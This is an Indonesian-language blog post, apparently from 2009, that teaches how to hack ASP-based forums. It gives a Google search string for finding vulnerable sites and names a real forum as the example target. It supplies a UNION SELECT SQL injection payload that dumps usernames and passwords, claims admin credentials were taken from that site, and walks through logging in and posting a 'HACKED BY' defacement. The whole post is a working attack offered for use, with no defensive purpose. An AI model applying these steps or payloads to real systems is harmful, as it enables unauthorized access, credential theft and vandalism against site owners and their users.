system32: Hacking ASP Forums

Allow...semua di postingan kali ini kita akan coba belajar hacking Asp forums..langsung aja dech..
Ketik di google
inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.

Hmm......

Trus klik tombol post....
Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi.

Taraaaaaaaa..deface full :))

system32

Selasa, 28 April 2009

Hacking ASP Forums

Blog Archive

check page ranking